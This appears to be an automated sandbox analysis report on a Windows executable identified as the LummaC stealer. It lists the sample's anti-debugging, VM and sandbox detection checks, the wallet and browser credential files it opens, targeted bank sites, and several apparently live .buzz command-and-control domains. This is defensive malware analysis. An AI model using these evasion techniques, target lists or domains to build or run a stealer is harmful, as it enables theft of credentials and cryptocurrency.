Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0A7D second address: 49A0AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3B34C1F66Eh 0x0000000f push eax 0x00000010 jmp 00007F3B34C1F66Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov cl, 3Eh 0x00000019 pushfd 0x0000001a jmp 00007F3B34C1F671h 0x0000001f sbb eax, 67123016h 0x00000025 jmp 00007F3B34C1F671h 0x0000002a popfd 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov edx, 745C6C9Eh 0x00000034 popad 0x00000035 cmp dword ptr [75AB459Ch], 05h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov ebx, esi 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0B60 second address: 49A0B71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B09EB second address: 49B0A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3B34C1F66Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F3B34C1F671h 0x00000016 push esi 0x00000017 pop edi 0x00000018 pop eax 0x00000019 call 00007F3B34C1F66Dh 0x0000001e push eax 0x0000001f pop edi 0x00000020 pop ecx 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F3B34C1F673h 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b jmp 00007F3B34C1F674h 0x00000030 movzx eax, dx 0x00000033 popad 0x00000034 push ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jmp 00007F3B34C1F672h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0A84 second address: 49B0A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0A9C second address: 49B0AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0AA0 second address: 49B0AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0AA6 second address: 49B0AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0AAC second address: 49B0AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0AB0 second address: 49B0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B34C1F677h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0AD4 second address: 49B0AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0AF9 second address: 49B0AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0AFD second address: 49B0B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0B01 second address: 49B0B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0B07 second address: 49B0B0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0B0C second address: 49B0B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 900Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F3BA5CBCF06h 0x00000011 pushad 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F3B34C1F674h 0x00000019 sbb si, 3158h 0x0000001e jmp 00007F3B34C1F66Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Special instruction interceptor: First address: 508CD0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Special instruction interceptor: First address: 508CF5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Special instruction interceptor: First address: 6AC5AC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Special instruction interceptor: First address: 5062EE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Special instruction interceptor: First address: 6C0BFB instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Code function: 5_2_0050C06D rdtsc

5_2_0050C06D

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window / User API: threadDelayed 1541	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window / User API: threadDelayed 1560	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window / User API: threadDelayed 1603	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window / User API: threadDelayed 1553	Jump to behavior

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 6684	Thread sleep count: 80 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 6684	Thread sleep time: -160080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 396	Thread sleep count: 74 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 396	Thread sleep time: -148074s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 5076	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 1260	Thread sleep count: 1541 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 1260	Thread sleep time: -3083541s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 2780	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 1264	Thread sleep count: 1560 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 1264	Thread sleep time: -3121560s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 6396	Thread sleep count: 1603 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 6396	Thread sleep time: -3207603s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 2012	Thread sleep count: 1553 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe TID: 2012	Thread sleep time: -3107553s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: ZX2M0AXZ56.exe, ZX2M0AXZ56.exe, 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ZX2M0AXZ56.exe, 00000005.00000002.2230217707.0000000000927000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: ZX2M0AXZ56.exe, 00000005.00000002.2230217707.0000000000975000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404897117.0000000000975000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2171467591.0000000000975000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2171026905.0000000000975000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885476919.0000000005367000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: ZX2M0AXZ56.exe, 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: ZX2M0AXZ56.exe, 00000005.00000003.1885553590.000000000535A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: NTICE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: SICE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Code function: 5_2_0050C06D rdtsc

5_2_0050C06D

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Code function: 5_2_004EE110 LdrInitializeThunk,

5_2_004EE110

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: ZX2M0AXZ56.exe	String found in binary or memory: hummskitnj.buzz
Source: ZX2M0AXZ56.exe	String found in binary or memory: cashfuzysao.buzz
Source: ZX2M0AXZ56.exe	String found in binary or memory: appliacnesot.buzz
Source: ZX2M0AXZ56.exe	String found in binary or memory: screwamusresz.buzz
Source: ZX2M0AXZ56.exe	String found in binary or memory: inherineau.buzz
Source: ZX2M0AXZ56.exe	String found in binary or memory: scentniej.buzz
Source: ZX2M0AXZ56.exe	String found in binary or memory: rebuildeso.buzz
Source: ZX2M0AXZ56.exe	String found in binary or memory: prisonyfork.buzz
Source: ZX2M0AXZ56.exe	String found in binary or memory: mindhandru.buzz

Source: ZX2M0AXZ56.exe, ZX2M0AXZ56.exe, 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmp

Binary or memory string: /Program Manager

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: ZX2M0AXZ56.exe, 00000005.00000002.2230692882.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2194819090.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2209586734.00000000009DC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: ZX2M0AXZ56.exe PID: 3804, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ZX2M0AXZ56.exe, 00000005.00000002.2230217707.0000000000939000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\X
Source: ZX2M0AXZ56.exe, 00000005.00000002.2230217707.0000000000939000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\X
Source: ZX2M0AXZ56.exe, 00000005.00000003.2170689268.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: ZX2M0AXZ56.exe, 00000005.00000003.1945802553.00000000009A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: ZX2M0AXZ56.exe, 00000005.00000003.2171547389.0000000000986000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: ZX2M0AXZ56.exe, 00000005.00000003.2170689268.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: ZX2M0AXZ56.exe, 00000005.00000003.1944581923.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: ZX2M0AXZ56.exe, 00000005.00000003.1945802553.00000000009A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: ZX2M0AXZ56.exe, 00000005.00000003.2171437593.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: ZX2M0AXZ56.exe, 00000005.00000003.2171437593.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
